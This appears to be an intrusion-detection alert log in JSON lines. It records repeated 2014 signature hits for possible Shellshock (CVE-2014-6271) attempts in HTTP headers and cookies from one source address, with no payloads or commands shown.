{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.035308","event_type":"alert","src_ip":"62.210.75.170","src_port":55252,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.035308","event_type":"alert","src_ip":"62.210.75.170","src_port":55252,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.035308","event_type":"alert","src_ip":"62.210.75.170","src_port":55252,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.134790","event_type":"alert","src_ip":"62.210.75.170","src_port":55297,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.134790","event_type":"alert","src_ip":"62.210.75.170","src_port":55297,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.134790","event_type":"alert","src_ip":"62.210.75.170","src_port":55297,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.238505","event_type":"alert","src_ip":"62.210.75.170","src_port":55326,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.238505","event_type":"alert","src_ip":"62.210.75.170","src_port":55326,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.238505","event_type":"alert","src_ip":"62.210.75.170","src_port":55326,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.344311","event_type":"alert","src_ip":"62.210.75.170","src_port":55357,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.344311","event_type":"alert","src_ip":"62.210.75.170","src_port":55357,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.344311","event_type":"alert","src_ip":"62.210.75.170","src_port":55357,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} |